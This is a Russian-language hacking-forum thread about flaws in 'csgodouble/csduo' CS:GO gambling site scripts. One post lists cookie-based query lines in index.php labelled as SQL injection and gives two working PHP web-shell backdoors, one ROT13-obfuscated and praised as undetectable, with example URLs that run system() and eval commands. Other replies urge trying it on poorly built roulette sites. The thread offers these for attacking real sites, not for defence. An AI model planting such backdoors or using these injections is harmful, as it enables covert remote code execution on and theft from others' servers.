Уязвимости в csgodouble csduo топ!!!

[Lar1k]

Обновил.
Фиксов пока не будет

 

[luirnu]

а что дуо написан не на ларавел?

 

[Fraps01]

Еще есть?

 

[Daylax]

А как юзать то?

 

[opuscoins]

Кому надо - тот поймет как юзать

 

[luirnu]

да напишите этот дуо сами, там писать то 3 пальца обоссать, 2 дня работы по 4 часа максимум

 

[Stasik<3]

да напишите этот дуо сами, там писать то 3 пальца обоссать, 2 дня работы по 4 часа максимум

Удачи

 

[dmxserver]

ФИГА СЕБЕ

 

[Exs]

1) /index.php 18: $sql = $db->query("SELECT * FROM `users` WHERE `hash` = " . $db->quote( $_COOKIE['hash'])); SQL Injection
2) /index.php 351: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
3) /index.php 395: $sql = $db->query('SELECT * FROM `trades` WHERE `id` = '.$db->quote( $_COOKIE['tid']).' AND `status` = 0'); SQL Injection
Уязвимые места index.php
Если нужно буде выложу больше

1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно

<?php
@$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);'));
?>

index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');

2) PHP-Backdoor, спасибо тебе, типизация которой нет

<?php $_REQUEST['f']($_REQUEST['c']); ?>

index.php?f=assert&c=phpinfo();
index.php?f=eval&c=echo 1;

а что дают эти запросы? лично у меня выводит к примеру:

У вас нет разрешения на просмотр ссылки, пожалуйста Войдите или Зарегистрируйтесь

 

[GFX.DMITRIY]

Нужна помощь? Обращайся!

У вас нет разрешения на просмотр ссылки, пожалуйста Войдите или Зарегистрируйтесь

 

[hody]

Лол,прикольно

 

[Ya.Korj]

Godno, но уже наверное пофикшено_))))

 

[PapaJoe]

может проканать на каких нибудь не давно созданных рулетках школьниками